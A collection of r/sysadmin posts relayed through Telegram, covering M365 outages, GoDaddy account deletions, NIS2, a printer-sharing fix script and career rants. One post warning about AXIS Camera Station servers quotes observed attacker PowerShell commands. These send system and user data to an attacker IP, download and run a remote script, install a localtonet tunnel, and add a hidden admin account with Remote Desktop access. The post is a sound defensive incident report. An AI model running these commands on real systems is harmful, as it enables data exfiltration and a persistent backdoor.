-
Reddit SystemAdmin. Thanks @reddit2telegram and @r_channels.
Issues with Microsoft 365 logins
We are getting reports of user not able to log into email. Upon investigation we are seeing users able to complete MFA and then be redirected to specifically m365.cloud.microsoft/?auth=2
And failing to redirect any further.
Going to outlook.office.com after MFA allowed the user to access email.
It seems there is something wrong with the hand off from MFA/logins to Microsoft services.
https://redd.it/1mve29d
@r_systemadmin
Yealink Meeting Room Firmware sets admin password to an empty string
There was a firmware update last week (155.15.0.100) and I noticed, that the time displayed was wrong. The NTP Server was still configured though…
Anyway I tried to login into the device (local and web), but it claimed “wrong password”. I then changed the password in the Yealink Cloud but that did not work.
Turns out that somehow the “new” password is now just empty. Just press login and you are in. Anyone else experiencing this? Was the firmware update just a coincidence?
https://redd.it/1mv8v09
@r_systemadmin
Then they came for IT, or poor one out?
With my job I get some information before others. One of the pieces is getting a heads up about investigations for HR etc just so we can put items on hold or setup some monitoring etc. Normally the folks are either ones I don't know or ones that in the back of my head brings a smile since they're pretty much a hole anyway. Today was different one of my co-workers (in a different group but still IT) has the process started for them. HR reached out and asked for my part to start. There a chance they'll survive but it rare.
It one of those things we talk about it and at the end of the day we know stuff like this is part of the job and even though you want to tell them to run, you can't really. It just easier when it someone you really are rooting to be kicked out of the building.
The only saving grace is knowing there a reorganization coming up that is suppose to be a mess that hasn't been communicated out to everyone. At least the person won't suffer like I know we all will, dealing with that.
https://redd.it/1mv39kr
@r_systemadmin
Job Hugging
I saw an article on Reddit about “Job Hugging” meaning people are clinging to their jobs out of fear with all the instability. I turned down a very, very nice opportunity for a new branch of an established company last year in the EV space and one of the driving factors of that decision was all the unknown around the EV market going into 2025. About 4 months after my would-be start date in January they shuttered all construction on the facility indefinitely and are laying off pretty much everyone including some of the people I interviewed with. I think I’ll hug my Job very tight for a while!
Bullet dodged!
https://redd.it/1muubof
@r_systemadmin
Is requiring CTRL ALT DEL to logon or unlock Windows a useful security policy?
Does this still have value to mitigate Windows security threats in 2025?
https://redd.it/1munwzf
@r_systemadmin
client, as the accounts are already gone.
This seems to be an edge case where someone could lose a great deal because GoDaddy deleted Microsoft accounts.
I would think there should be a well-defined way that Microsoft accounts could move from paid tenants to free accounts.
In this case, thank goodness, there were no Bitlocker'd drives or OneDrive usage or other info stored in the Microsoft accounts. The C:\User files were still there and I could recover them the hard way, as it was not possible to login to the PC. There was never a local account.
https://redd.it/1mumwfb
@r_systemadmin
Shadow IT Queen Strikes Again
We set up a brand new Windows Server 2025 so everyone could work faster, safer, and from one place. Old workstations are basically thin clients now. Simple setup and takes care of a lot of "My computer is running slow" issues...
Except one user — the Shadow IT Queen. She refuses to use the server because her Chrome bookmarks weren’t there. Instead of calling me, she “fixed it herself”.
I only found out of her activity when I ran query user logs on the individual VM. When I pay a visit to her office I find out she hasn’t been saving anything to the server anyway. I have to transfer the difference, but she took care of that too... Because she’s been emailing all her files to herself.
She breaks compliance every chance she gets. Shadow IT Queen doesn’t just bend rules, she invents new ones, and new ways of doing things.
Long live the Queen...
https://redd.it/1mulz8b
@r_systemadmin
If OS platforms were StarCraft races…
I was working on integrating all OS platforms into Intune (corporate, BYOD, etc.) and suddenly realized there’s a StarCraft analogy for operating systems:
Windows = Terran
The standard army. Mass-produced, flexible, built for control and infrastructure. They’re everywhere, and they dominate simply by sheer numbers and resources.
macOS = Protoss
Sleek, powerful, expensive, and extremely polished. Everything is tightly integrated and optimized. The “elite units” of the OS world
Linux (Ubuntu and friends) = Zerg
Open-source, swarming in countless variations (distros). They’re simple at the core, but extremely adaptive. And just like Zerg can overwhelm with numbers, Linux can become incredibly powerful with some good bash scripts.
BSD = Xel’Naga — the ancient, almost godlike foundation from which both macOS (Protoss) and Linux (Zerg) ultimately descend
Don't be too serious at work :)
btw, I use Arch (and prefer Warhammer40k)
https://redd.it/1mui5z8
@r_systemadmin
Do logon banners have any legal weight?
You know, that "This is an ABC, Inc. computer system, unauthorized use prohibited, blah blah blah"? I hate that extra click/keypress, and I've always just kinda assumed that it had about as much legal weight as people who claim they're going to call their lawyers (that they don't have) and sue you, which is none.
https://redd.it/1mug1c9
@r_systemadmin
How long does it take you to assess working for a new company?
28th year in IT. Got hired last Monday with an MSP. White Glove Service, good sales pitch.
During my onboarding, I was not provided a list of the basics. No written or online company policies. No list of products that the company uses as its standards, etc. Easy oversight. So I went to my supervisor, asked for the product list and policies. Was directed to the Ticketing System.
Digging around, notice the dates- 3 years of data, so recent migration, can't find what I need. So I pop into the President's office. Was referred to the Ticketing System.
Fine, this is a figure it out environment. So I looked at every document in the company section. Didn't take long; information does not exist. Pick some random clients and look. We are 3 hours into the day, and I have a clear picture. There is no usable documentation internally, poor client documentation, and a lack of foundation for some basic business practices.
Nope. I was not hired for this. 3 hours in..lol
Worked out the week, collected my pay, and went home.
Sent an email to the President with a list of things I would like to discuss on Monday. He replied to my personal email "This email is unexpected, extremely unprofessional, and absolutely incorrect on all counts. Yada yada, will you be at work on Monday?". LOL you already fired me, I'm not stupid.
I have to go there, forgot my glasses. So I reply, "Sure, see you on Monday."
So when I was greeted at the door with a box for me, I was relieved, those are expensive glasses...LOL
https://redd.it/1mub8v4
@r_systemadmin
What is the least irritating printer I can buy and personally use as a blind person?
I’m a half-assed sysadmin who runs some websites and plays with Linux servers for fun. I don’t know if that makes me one of you or not, but I know there are people here who have to deal with printers. (You have all of my sympathies, by the way.)
I had an HP Laserjet P1505N that has been hooked up to my Windows server for about 10 years. It finally stopped working and I honestly don’t know if I can be bothered doing the work to figure out why. If I can’t figure it out, I want a replacement that works with just as little fuss as this one does. I really don’t want to have to touchscreen my way to getting on wi-fi or whatever, because that will be the point where I’ll have to video-call someone. I need something that either has a web interface or very simple USB operation, and I’d really like the minimum number of on-device controls. Does this exist anymore, or have we reached the point where every printer has a whole operating system and UI?
tl;dr: If you already had a print server and just wanted something that would shut up and work with your print server, what would you buy?
https://redd.it/1mu4orj
@r_systemadmin
Boss quit, don’t know what to do
I was hire as a desktop support for my country, my boss was in the US, he was sys admin for the entire company even giving support to everyone all day.
He hired me and another guy to do desktop support and asset management basically.
He quit because they didn’t gave him the recognition he deserved and I am reporting to the VP of HR now, doing literally nothing except buying IT equipment, asset tracking and thats it because the guy that took my boss job/support channel is not even my boss.
I feel useless and don’t even have access to anything like Okta admin Slack or other things to learn some sys admin skills.
I thought about talking to this new sys admin guy although i dont have experience I would like to be his vassal but I dont think he has the time to explain me shit.
What tools/technologies could I learn to have some advantage in my wasted working hours?
Its a startup, security is almost non existent and everything is kind of a mess. Most things are automated with okta and our own CRM app.
https://redd.it/1mu10b4
@r_systemadmin
What are your opinions about NIS2?
What are your opinions about the new European directive NIS2?
I will express my opinion in this post. All constructive comments and opinions are welcome.
While I think that we all recognize the importance of information and cyber security, it seems like NIS2 is close to impossible to be implemented in many organizations.
There are 3 main points that I would like to present:
1. The directive itself is extremely unclear, gives no practical measures or recommendations to be implemented. This leaves the interpretation of the directive up to the personal opinion of the people in the control organs. It is very easy to write something, while you actually say nothing. No practical measures that should be taken or clear requirements mean that no matter what measures are taken, it can always be said that the measures are inadequate. Lack of clear guidelines means high potential for corruption and using the directive in a way it was never intended to be used
2. Practical implementation of the directive when it comes to shared terminals and limited budgets is close to impossible. Many organizations use shared terminals/computers, where different shifts must use the same group of computers to do their job and perform work related tasks. In the most basic AD configuration, the user folders are located on the local computer. Imagine a computer where 10, 20 or more people log every day. Centralizing the storage of all that information is potential point of failure and would require significant amounts of storage, for example. Which leads me to the next point
3. The directive unilaterally defines what companies/enterprises/organizations fall under it's scope, yet not only the directive itself is unclear, but implementing it is extremely expensive. We are talking about hardware and software..including storage, servers, software tools and so on.
As we all know organizations that receive government funding usually receive extremely limited IT funding, if actually any. One one hand the directive demands, on the other hand a number of organizations exist that must operate, yet there is no budget to implement it. It's Catch22.
For example, all around the world, many industries and organizations use old equipment because it is prohibitively expensive to replace it. In US there were attacks of hospitals still using WindowsXP long past it expiration date. Yet, the reason is pretty simple. Vendors of specialized equipment rarely use the latest versions of OS and software packages, because certification of such equipment is expensive. And such organizations don't replace it because it is prohibitively expensive to do so.
So, we are in a situation with no real IT budgets and no budgets to replace equipment running legacy operating systems and software, no vendors offering equipment using the latest stable and secure versions of the OS due to prohibitively expensive recertification, having extreme amounts of technical debt and no real way out for such organizations.
________________
Final thoughts - I really don't know what will happen. Is it better for example..to close almost every hospital or fine it, while the healthcare sector for example is in permanent struggle and financial deficits? And who will take care of patients and treat them if that happens? Same for most other organizations in similar situations. Rarely even the branches of the government institutions have the latest and most super-duper secure servers on premises with the latest versions of everything, as both computers and software cost money. Go to any government institution anywhere and observe with what those people are forced to work on a daily basis. So, the governments should close themselves? Or we can think of more practical and actually sound measures for cyber security that don't require external audits by companies that exist solely to leech money from the unfortunate and extort them and not to impose requirements that literally force administrations, hospitals and organizations to spend half of their total
Patch your AXIS camera station servers, especially if you are using port forwarding. Sophos MDR caught and stopped malicious activity on a headless computer that was only running Camera Station.
Over the weekend I received a call from Sophos SOC. I was a little skeptical at first, but then I saw the localtonet.exe and the various commands. I also googled and found an AXIS advisory. Again, no one uses this computer. It has no keyboard or mouse and it just runs camera station. I strongly suspect this to be related to the vulnerability.
https://www.axis.com/dam/public/9b/a5/72/cve-2025-30023pdf-en-US-485733.pdf
Below is what Sophos shared. I replaced the IP address with the country of origin. We are in the U
1. Invoke-WebRequest -Headers @{"User-Agent"="$env:COMPUTERNAME"} -Uri "hxxp[://\]IP in France/log" -Method Post -Body ((Get-PSDrive -PSProvider FileSystem | Select-Object Name, @{Name='Used(GB)';Expression={[math\]::round($_.Used/1GB,2)}}, @{Name='Free(GB)';Expression={[math\]::round($_.Free/1GB,2)}}, @{Name='Total(GB)';Expression={[math\]::round($_.Used/1GB + $_.Free/1GB,2)}}) | ConvertTo-Json) -ContentType "application/json"
2. Invoke-WebRequest -Headers @{"User-Agent"="$env:COMPUTERNAME";"NUMBER_OF_PROCESSORS"="$env:NUMBER_OF_PROCESSORS";"WinVer"=(Get-WmiObject win32_operatingsystem).Caption} -Uri "hxxp[://\]IP in France/log" -Method Post -Body (((Get-PSDrive -PSProvider FileSystem | Select-Object Name, @{Name = 'Used(GB)'; Expression = { [math\]::round($_.Used / 1GB, 2) } }, @{Name = 'Free(GB)'; Expression = { [math\]::round($_.Free / 1GB, 2) } }, @{Name = 'Total(GB)'; Expression = { [math\]::round($_.Used / 1GB + $_.Free / 1GB, 2) } }), (Get-LocalUser | Select-Object Name,Enabled,Description),(Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress),(Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property Manufacturer,Model,Domain,Name,DNSHostName,UserName,PrimaryOwnerName,HypervisorPresent) ) | ConvertTo-Json) -ContentType "application/json"
3. Invoke-Expression(IRM -Headers @{"User-agent"="$env:COMPUTERNAME/$env:USERNAME"} "hxxp[://\]IP in France/script")
4. cd $env:temp; IWR hxxps[://\]localtonet[.\]com/download/localtonet-win-64[.\]zip -OutFile localtonet[.\]zip; Expand-Archive localtonet[.\]zip -DestinationPath .; .\\localtonet[.\]exe authtoken buqCDfHX57A08jnrV1MpGcJTByo2KgmNz
5. Invoke-Expression(IRM -Headers @{"User-agent"="$env:COMPUTERNAME/$env:USERNAME"} "hxxp[://\]IP in France/script")
6. cd $env:temp; IWR hxxps[://\]localtonet[.\]com/download/localtonet-win-64[.\]zip -OutFile localtonet[.\]zip; Expand-Archive localtonet[.\]zip -DestinationPath .; .\\localtonet[.\]exe authtoken buqCDfHX57A08jnrV1MpGcJTByo2KgmNz
Observed Commands: a few of them for the user 'AXIS'
"C:\\Windows\\system32\\reg.exe" add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist /t REG_DWORD /d 0 /f /v AXIS
"C:\\Windows\\system32\\net.exe" localgroup Administrateurs /add AXIS
"C:\\Windows\\system32\\net.exe" localgroup "Remote Desktop Users" /add AXIS
C:\\Windows\\system32\\net1 localgroup "Remote Desktop Users" /add AXIS
C:\\Windows\\system32\\net1 user AXIS /active:yes
https://redd.it/1mtt93k
@r_systemadmin
Helpdesk dude doing Linux work - need help
I started my first IT job month and a half ago, my only prior experience was IT Technical High School, in which I learned a couple of basic things, and I also did some home labbing in my freetime. I was asked to look into our Apache server and fix some recurring outage, and I did it. Now I'm getting asigned more Linux related tasks. I really want to learn something and I think Linux would be a great career specialization. I need some tips for a fresh guy. I feel really incompetent.
What things I should look out for? Are there any must-read books or great videos to watch? Can I do anything to make myself look (and feel) less incompetent? How can I learn Linux administration in a reasonable pace?
Any tips greatly appreciated.
https://redd.it/1mtqyj6
@r_systemadmin
“7 Months of Microsoft 365 Support Tickets = Silence, Bounce Backs, $50k+ Loss”
I’m a solo business owner whose entire workflow depends on Microsoft 365 email. For 7+ months I’ve been stuck in what feels like a Groundhog Day support loop — dozens of tickets, no resolution, and escalating financial damage.
Here’s the short version of what’s happened:
• Tickets dropped or archived as duplicates without action.
• Escalations never executed — even when explicitly requested (e.g., case 2506130040004496 was never sent to Sender Reputation or Security Engineering).
• Same data requested over and over despite full compliance each time.
• Critical evidence ignored: non-Gmail addresses are also bouncing, but agents keep framing this as “just Gmail filtering.”
• Support silo chaos: Riya, Migz, Abhilash, Daril, Ayodele, Vedent — all separate agents, no alignment.
• 7 months of delay with no escalation path, leaving me to act as my own IT department.
Impact:
• Over $50,000 in lost business opportunities.
• My reputation with clients damaged by bounced emails.
• I’ve spent countless hours in support purgatory instead of running my business.
At this point, it feels like a case study in how siloed, non-narrative support systems can ruin small operators.
Has anyone else been trapped in a Microsoft 365 support hamster wheel like this? Any advice on how to break through, or escalate outside the endless ticket cycle? Of course,
at the end of each ticket I’ve asked to collate combine, ticket #’s escalate, etc. but the protocols do not seem to incentivize collaboration.
https://redd.it/1mv6s39
@r_systemadmin
WSUS, anyone else's gone mad yesterday?
I have a very simple Server 2022 WSUS server.
Yesterday I got a disk space alert for it which was strange as it usually has lots of spare space and the sync is early AM and the disk alert was mid afternoon.
It looks like it was re-downloading a TON of content from Microsoft's Fastly CDN IPs.
Literally nobody here has touched it to approve anything and it looks like it's now using around 75% more space than it was and I have no idea why.
It's not a big issue but did anyone else see anything similar please?
Jas
https://redd.it/1mv8513
@r_systemadmin
GA- Tenant *Poof* Gone
Our org is at a standstill. None of our apps or partners/consultants are able to contact or connect to our tenant or any apps. There are NO logins being processed for any account- and therefore no MS/SSO/Etc. It appears that somehow our Azure/Entra Global Admin is somehow no longer attached the tenant. Our CSP cannot access our tenant and Microsoft is... mostly being Microsoft. Has anyone else dealt with this? We have slowly over then last 6 years or so moved nearly 85-90% off-prem. And this is what the C-suite feared in doing so.
Is this a "compromise" and our tenant is being held hostage or just "Oops, I deleted it on accident? -CoPilot"
*edit- verbiage, grammar
https://redd.it/1musfuy
@r_systemadmin
VP Wants easy way to search all teams' messages
My VP wants the ability to search through all Teams messages for our tenant.
We have O365 Basic for most users.
I know you can do it using ediscovery, but it's clunky and slow.
Any suggestions?
https://redd.it/1murjvm
@r_systemadmin
AITA
Last night I got a call after hours which ignored as the user is not utilizing any vital applications as well as this being a normal occurance for help desk items (which do not pertain to me)
She sent an email asking for documentation that was sent a couple months ago via email (every dept has their own SharePoint and are responsible for their documents)
I replied this morning with the document and a screenshot of when It was sent. As well as a friendly reminder that they have a SharePoint also how to search outlook on the search bar.
She came back so mad and upset and said that I am in the "service industry" and it doesn't matter what she wants I must provide it to her no matter if it was previously sent. Blah blah blah
I probably shouldn't have sent the screenshot/instructions but I honestly didn't know if she knew how to search outlook. Heck I showed her how to create bookmarks on chrome last months and she's been working at the same place for 20 years...
AIYTA?
https://redd.it/1mup6nh
@r_systemadmin
GoDaddy deleted paid M365 accounts because users switched email to Google Workspace?
tl;dr: Why did GoDaddy delete the Microsoft M365 accounts my client is still paying for?
A newer client called me on 8/13/2025, said they couldn't login to their Windows 11 PC. Small business, not a domain, not even really a workgroup. They were logging in to the PC with their Microsoft account.
They'd bought their new domain name at GoDaddy a year or so ago, before I'd ever helped them. They bought GoDaddy's "Microsoft 365 Secure Business Professional" for three users as "Microsoft 365 Email Plus with Security," which created three Microsoft accounts like user@theirdomain.com, with M365 email services at each email address. These were annual subscriptions, paid up through 10/22/2025. They'd set up new PCs with these Microsoft accounts.
On 6/26/2025, they needed to switch to a new CRM that required Google email. They called me to do the migration. I switched their MX records and migrated their email without a hitch, it's been working fine ever since.
On 8/13/2025, the user@theirdomain.com Microsoft account seemed to be gone. Attempting a login at Office.com says the password is incorrect, clicking "reset the password" redirected to the GoDaddy SSO page, which said the account does not exist.
I argued with GoDaddy support for a good 90 minutes, asking them why they deleted the underlying Microsoft accounts. All we'd done on 6/26 was shift the MX records, which GoDaddy does not control. The name servers are at yet another company that manages their web site. GoDaddy still controlled the tenant for M365, as shown by the redirection to their SSO page.
For the first 60 minutes of the call, GoDaddy said they had to delete the accounts because you can't have email services in two places. This did not make sense to me, as I believe the MX records are the deciding factor. The client was still paying for the GoDaddy M365 email service, but was not using that, (nor even using Office,) but they were relying on the underlying Microsoft accounts to login to their PC.
Around 60 minutes in, the GoDaddy support tech began to claim that he'd found a note on the account that said that Google had deleted the four Microsoft accounts on 7/7/2025, which did not make sense to me. I asked "how?" and "why?" and they had no answer, but they suggested I needed to talk to Google. Of course, I asked Google and they said they had not done anything like that, nor could they.
I don't see what would break for GoDaddy because they noticed that the MX records had changed and that a Google domain ownership verification TXT was present in DNS. I don't see why they would cancel services that are paid-up until 10/22.
The product is still there in the client's GoDaddy account, but there's nothing to manage because the Microsoft accounts are gone.
I don't see what would break for Google if the Microsoft accounts still existed, nor can I imagine that they had a way to reach into GoDaddy's tenancy and delete Microsoft accounts. I'm surprised that the PC login continued to work from 7/7 to 8/13.
At the end of the GoDaddy call, I asked them to release the M365 tenant. I presumed this defederation would at least stop the redirection through the GoDaddy SSO and offer a chance to create new Microsoft accounts at the domain. Indeed, now at Office.com, the initial login says the account does not exist.
I found many descriptions of how to defederate from GoDaddy M365. They all expected you'd be renewing M365 either direct or with another provider, which would imply the underlying Microsoft accounts would continue to exist. I did not find any guides that described how to stop the M365 subscription and yet retain the underlying Microsoft accounts.
I thought I had until 10/22 to decide how to handle that aspect. Their is no need for this client to continue M365 for Office or email, but Microsoft certainly likes users to have a (free) Microsoft account with the username as an email address. It's a moot point for this
How does your org structure IT & Security?
Most of my experience comes from SMB orgs where all SecOps responsibilities fell to the sysadmins. We'd work with internal auditors to meet compliance frameworks, but that was about the extent of it. How are y'all doing it? It feels like every company draws the lines differently.
I've seen some places where Security is its own separate team with its own leadership chain, reporting up to a CISO. At others, Security and sysadmins falls under the same IT leadership. I would think keeping things under the same team would be more efficient and less confrontational when things like false positives come up, but I could be totally wrong here.
Also, do your security team members actually "do the thing" or do they just report it? If they just report the security finding and CVEs, does that make it better, or does that cause friction because it's just one more department requesting things from IT?
So I’m curious, in your org, is it:
IT and Security (two completely separate teams)?
IT with Security (one team to rule them all)?
Or is it just you or a small team of sysadmins wearing all the hats?
If you’ve worked in more than one setup, which one actually worked best in practice and why?
https://redd.it/1muhnbn
@r_systemadmin
r/ceph banned ?
so /r/ceph got banned ? rule 2 ? anyone know what happend ? any /r/ceph mods around that could appeal ? suck to lose a technical subreddit
https://redd.it/1muftg1
@r_systemadmin
Best practice for running a detection as user but remediation as Admin (Intune)
So in my work environment, I've noticed that we have two sets of Edge installed on the majority of EU devices. This means that only one version is being updated regularly. The stable version appears to be pushed out via our Windows Autopatch groups; however, our patch management solution seems to update clients to the beta version of Edge. Because of this, the stable version is usually left on the device, but as an old version. Which then flags as an issue from a CS standpoint.
I had in mind to write a detection script to locate if Edge Stable was installed, and if it was under a certain version (eg 138.x), then it would remove the appx package, leaving the beta version, which is up to date. I have written and tested the detection script, and this works without issue; however, this only works at the user level. Meaning I have to run it with the logged-on credentials to ensure Intune can find the Appx package when running the script. However, to then remove the appx package, this requires system permissions. I have tried to adjust my script to allow searching as the user, but this just returns no issues.
Would best practice simply be deploying a Win32 app to delete any version LT 138.x, or is there a simpler way to detect and delete that I am missing? I have tried to find similar cases to what I am experiencing, but they all differ in large ways.
Any help is much appreciated.
https://redd.it/1mucp4n
@r_systemadmin
Win11 24H2 Printer Sharing Fix
I made this script to help myself and others out there to fix the issue with Win11 24H2 printer sharing.
I was getting the error 0x00000709 before this fix.
Setup:
1. Win11 computer with shared printer (server)
2. Win11 computers as clients
3. Win10 computers as clients
Before running the batch file, I did the following:
1. Set network type to Private
2. Enabled network discovery, file and printer sharing
3. Disabled public folder sharing, password protected sharing
Made the batch file below and run it as admin on both client and server computers.
Restarting may be needed but in my case I didn't need to (your mileage may vary)
Any feedback to improve the script will be appreciatedecho off:: =========================================:: Configure RPC for Printers with Fixed Port:: =========================================echo ===================================echo Windows 11 24H2 RPC with fixed portecho ===================================echo.:: Set a fixed port (example: 601)echo Setting RpcTcpPort to 601reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcTcpPort /t REG_DWORD /d 601 /fecho.:: Configure RPC protocol settingsecho Registry entry: RpcUseNamedPipeProtocol = 1reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcUseNamedPipeProtocol /t REG_DWORD /d 1 /fecho.echo Registry entry: RpcProtocols = 0x7reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcProtocols /t REG_DWORD /d 0x7 /fecho.echo Registry entry: ForceKerberosForRpc = 0reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v ForceKerberosForRpc /t REG_DWORD /d 0 /fecho.:: Add firewall rule for port 601 if it does not already existnetsh advfirewall firewall show rule name="Print-RPC 601" >nul 2>&1if errorlevel 1 (echo Adding firewall rule: Print-RPC 601netsh advfirewall firewall add rule name="Print-RPC 601" dir=in action=allow protocol=TCP localport=601 profile=private) else (echo Firewall rule "Print-RPC 601" already exists):: Add firewall rule for endpoint mapper (135) if it does not already existnetsh advfirewall firewall show rule name="Print-RPC Endpoint Mapper" >nul 2>&1if errorlevel 1 (echo Adding firewall rule: Print-RPC Endpoint Mappernetsh advfirewall firewall add rule name="Print-RPC Endpoint Mapper" dir=in action=allow protocol=TCP localport=135 profile=private) else (echo Firewall rule "Print-RPC Endpoint Mapper" already exists):: Restart the Print Spooler serviceecho.echo Restarting Print Spooler...net stop spooler >nul 2>&1net start spoolerecho.echo Done! Printer RPC settings have been configured.pause
https://redd.it/1mu987n
@r_systemadmin
I did it, I've send that angry but still professionally sounding mail to the higher ups.
Hi my fellow Sysadmins! I'm just a lone IT wold here with a very busy IT manager. After getting out of today's meeting every last bit of my patience was gone, the drive back home was quiet and finally i got home and desided to send my thoughts via a mail, here is the mail quoted :
After today’s ISO review meeting, I felt it was important to share a short follow up from IT side.
Over the past months I’ve spent a significant amount of time including evenings and weekends to successfully migrate our infrastructure from VMware to Proxmox. This wasn’t just a technical task, it was a strategic move aimed at reducing long term costs and keeping the company away from unnecessary licensing expenses from VMWare now owned by Broadcom.
This is already paying off for the company and will continue to do so over the coming years.
That’s why I was honestly a bit disappointed with the way today’s discussion focused only on “the missing documentation or this is taking to long” and didn’t seem to recognise the amount of work that has already been completed to get us here.
IT is not “waiting” on anything, we’ve actively been building the foundation to switch over to Proxmox and we are finally here.
genuinely want to keep moving forward and get this fully completed, but I also hope the work done so far is acknowledged, IT may look expensive for MT but these are just basic necessity to keep an on-premise enterprise level network up and running and most importantly updated.
That said, I stayed a bit longer today and completed the Backup Documentation and it was attached as PDF. It includes all required elements (RPO/RTO, retention periods, restore testing and quarterly audit checklist) and is now ready for review.
Important: we still need management approval for the NAS or a separate U1 server for Proxmox Backup Server in order to actually implement this plan and finalize this ISO control section.
Without one of these hardware, IT simply cannot implement the required backup infrastructure, no matter how much documentation is produced.
Btw this said company was running VMware v6.0 till last week that over completed the migration over to Proxmox.
I've been only 10 years into IT, and today was it. I've had enough guys, it feels like no one's cares how much effort we are putting to keep everything running smooth and top notch! From the firewall to the bare basics like good quality monitors for the workstations. Everything looks like a another expense from IT again, it's running why update it?
Man yes thank you all for hearing my rant tonight.
And yeah I stayed calm in the meeting while i was boiling up a bit from the inside.
https://redd.it/1mu4yjx
@r_systemadmin
annual budgets for one thing. Because, unfortunately - people have to eat too and keep the lights on. And no, the cloud is not cheaper in this case, if in any and not a solution to any and every problem. It will just spread out the expenses, but won't liquidate them. And you for sure don't want certain data in the cloud.
Perhaps my opinion is controversial, perhaps it will lead to major number of downvotes. But that's the sad truth and the reality we live in. We will fine organizations like hospitals already in financial deficit and struggling...because they have no money. And those hospitals are struggling, because...the same governments that will fine them give them no money. It's paradox. Or we all will turn a blind eye and the compliance will be only on paper and security breaches and entire organizations and government institutions will continue to be regularly paralyzed by such attacks.
It's almost like(figuratively speaking) demanding the crippled to run or you will beat them as punishment and take away their last money for food from them.
https://redd.it/1mtxv8w
@r_systemadmin
Custom internal email to 10K+ users
We're a Micosoft *365 shop.
I've poked around a little, but thought I might ask this question here. HR wants to send an individual email to 10K+ people. The email will contain benefits information that's individualized. They would like to use mail merge to send these, but our Defender anti-spam policy stops after they reach their daily limit of XXX emails and blocks the HR person's account until IT intervenes. They can't do any of the normal things to get around this policy like a distribution list because each email is customized. How do most organizations handle needs like this?
Copilot suggests replacing the Anti-Spam policy and adding a custom one that excludes the users that need this feature. I'm wondering if there is a better way.
Our HRIS system is UKG Pro, I wonder if it can do that emailing. If so, what module is it so that I can see if we have that module.
How does your organization handle something like this?
https://redd.it/1mtv8j1
@r_systemadmin
Everyone knows what an email address is, right?
Saw this on Bluesky: https://bsky.app/profile/samwho.dev/post/3lwmf4y5kys2w
Direct link: https://e-mail.wtf/
I know sysadmins (especially those who've had to herd MTAs and not just MUAs) will score high or even perfect on this quiz, so I figured I would pass it along.
I scored 18/21 though, not sure how these are valid email addresses, and the quiz doesn't offer what RFC and where affirms or refutes each example:
* ` maybe-like-this @example.com` (leading/trailing space for local part is fine?)
* `fed-up-yet@ example.com ` (leading/trailing space for domain part is fine?)
* `""@example.com` (empty local part should be invalid, but escaping it makes it fine?)
https://redd.it/1mtt1su
@r_systemadmin
I went from SysAdmin, to Saas Admin, now I want to go SRE. Career advice?
General DIsclaimer: I have no college degree. All of my tech experience started in the DoD and now I'm in the civiliar sector (I have about ten years in this career field now).
As the title states, I started as a traditional SysAdmin. On site infrastructure, active directory, VMware, etc. I work fora company now that has shifted and is now a primary SaaS toolset (zoom, google workspace) and I just....don't really enjoy it anymore.
I want to get into cloud computing/SRE, and I was wondering if any folks here have made that transtition? What are your daily/weekly/monthly duties like? What tools do you use? What are skill gaps that you wish you had?
https://redd.it/1mtnyon
@r_systemadmin